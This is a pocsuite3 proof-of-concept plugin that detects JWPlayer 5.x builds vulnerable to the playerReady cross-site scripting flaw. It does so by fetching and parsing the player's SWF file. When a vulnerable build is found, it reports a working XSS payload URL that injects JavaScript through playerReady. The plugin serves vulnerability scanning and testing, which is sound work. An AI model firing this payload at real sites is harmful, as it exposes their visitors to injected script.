"""
If you have questions about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
For more information, please visit http://pocsuite.org
"""
import io
import re
import struct
import zlib
from urllib import request

from requests.exceptions import ReadTimeout

from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD
from pocsuite3.lib.utils import random_str
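class DemoPOC(POCBase):
    """Fingerprint JWPlayer 5.x builds whose ``playerReady`` parameter is XSS-prone.

    The check issues a GET to a handful of well-known player locations,
    keeps only responses served as ``application/x-shockwave-flash``,
    parses the SWF container and looks for a ``_version`` marker with
    major number 5 next to the ``jwplayer`` string. Only the probe URL
    and the detected version are reported; no payload other than those
    fingerprinting GETs is ever sent.
    """

    vulID = '0963'  # ssvid
    version = '1'
    author = ['pnig0s@ Knownsec', 'chenghs@knownsec.com']
    vulDate = '2013-04-16'
    createDate = '2013-04-17'
    updateDate = '2013-04-17'
    references = ['http://www.freebuf.com/articles/web/8705.html']
    name = 'JWPlayer 5.10 playerReady 跨站脚本漏洞'
    appPowerLink = 'http://www.longtailvideo.com/'
    appName = 'JWPlayer'
    appVersion = '5.10#'
    vulType = 'Cross Site Scripting'
    desc = '''问题主要是因为之前一个XSS漏洞没有修复完全,导致bypass再利用。原始的问题是playerReady参数值未做过滤直接进入ExternalInterface.call导致可以执行任意JS代码。'''
    samples = []
    install_requires = ['']

    # Candidate locations of the player binary, probed in this order.
    _SWF_PATHS = ('/player.swf', '/jwplayer.swf', '/play.swf', '/swf/player.swf')
    # Media type a response must carry before we bother parsing it.
    _SWF_CONTENT_TYPE = 'application/x-shockwave-flash'
    # Hard cap on how much inflated SWF we are willing to hold in memory:
    # the response body is untrusted, and a small zlib stream can expand
    # to many times its size. A real player file is a few hundred KB.
    _MAX_SWF_BYTES = 16 * 1024 * 1024
    # ``_version`` followed by the nearest run of digits and dots. Raw
    # string so ``\d`` is not an (invalid) string escape.
    _VERSION_RE = re.compile(r'_version.*?([\d\.]+)')

    def parse(self, swf_file):
        """Return the body of an SWF file, inflated if it is zlib-compressed.

        Args:
            swf_file: Either a filesystem path or a binary file-like object
                exposing ``read``. A path is opened and closed here; a
                caller-supplied object is left open for the caller.

        Returns:
            bytes: everything after the 8-byte header, decompressed when the
            signature is ``CWS``.

        Raises:
            ValueError: if fewer than 8 header bytes are available or the
                signature is neither ``FWS`` nor ``CWS``.
            zlib.error: if a ``CWS`` body is not a valid zlib stream.
        """
        if hasattr(swf_file, 'read'):
            stream = swf_file
            owns_stream = False
        else:
            stream = open(swf_file, 'rb')
            owns_stream = True
        try:
            return self._read_swf_body(stream)
        finally:
            # Close only what we opened so a caller's stream stays usable.
            if owns_stream:
                stream.close()

    def _read_swf_body(self, stream):
        """Parse the SWF header from ``stream`` and return the body bytes."""
        head = stream.read(8)
        if len(head) != 8:
            raise ValueError('Truncated SWF header: %d byte(s)' % len(head))
        # Layout: 3-byte signature, 1-byte format version, 4-byte LE file size.
        raw_signature, _, size = struct.unpack('<3sBI', head)
        signature = raw_signature.decode('latin-1')
        if signature not in ('FWS', 'CWS'):
            raise ValueError('Invalid SWF signature: %s' % signature)
        # ``size`` is the declared length of the whole uncompressed file
        # (header included), so it also caps how much we pull from the stream.
        body = stream.read(size)
        if signature == 'CWS':
            # Bounded inflate: never expand beyond what the header declares,
            # and never beyond our own ceiling, whatever the stream contains.
            limit = min(size, self._MAX_SWF_BYTES)
            body = zlib.decompressobj().decompress(body, limit)
        return body

    def _jwplayer_version(self, swf):
        """Return the embedded version string if ``swf`` is JWPlayer 5.x, else None.

        ``swf`` is the decoded SWF body. ``[\\d.]+`` can match a lone dot,
        so the major component is validated before it is converted.
        """
        if 'jwplayer' not in swf:
            return None
        matches = self._VERSION_RE.findall(swf)
        if not matches:
            return None
        major = matches[0].split('.')[0]
        if not major.isdigit() or int(major) != 5:
            return None
        return matches[0]

    def _verify(self):
        """Probe the known player paths and report the first one that fingerprints as JWPlayer 5.x.

        Returns:
            Output: success with ``VerifyInfo`` (probe URL and version) on a
            hit, otherwise a failed Output.
        """
        result = {}
        for path in self._SWF_PATHS:
            url = self.url + path
            try:
                resp = requests.get(url)
            except Exception as exc:
                # Best effort: an unreachable path is simply not a hit.
                logger.debug('request to %s failed: %s', url, exc)
                continue
            content_type = resp.headers.get('Content-Type', '')
            # Compare the media type only, ignoring any ``; charset=`` suffix.
            if content_type.split(';', 1)[0].strip().lower() != self._SWF_CONTENT_TYPE:
                continue
            # Parse the body we already downloaded instead of fetching the
            # file again through urllib, which bypassed the session's
            # proxy and timeout configuration.
            try:
                swf = self.parse(io.BytesIO(resp.content)).decode('utf-8', 'ignore')
            except (ValueError, zlib.error) as exc:
                logger.debug('%s is not a parseable SWF: %s', url, exc)
                continue
            version = self._jwplayer_version(swf)
            if version is not None:
                result['VerifyInfo'] = {
                    'URL': url + '?playerReady=document.location=window.name%2b%27//%27%2b',
                    'Version': version,
                }
                # First confirmed path is enough; avoid extra downloads.
                break
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap ``result`` in an Output: success when non-empty, failure otherwise."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _attack(self):
        """Attack mode performs the same non-intrusive fingerprint as verify."""
        return self._verify()

    def _shell(self):
        """Shell mode is not applicable to a reflected XSS check."""
        pass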
# Make this PoC discoverable by the pocsuite3 loader.
register_poc(DemoPOC)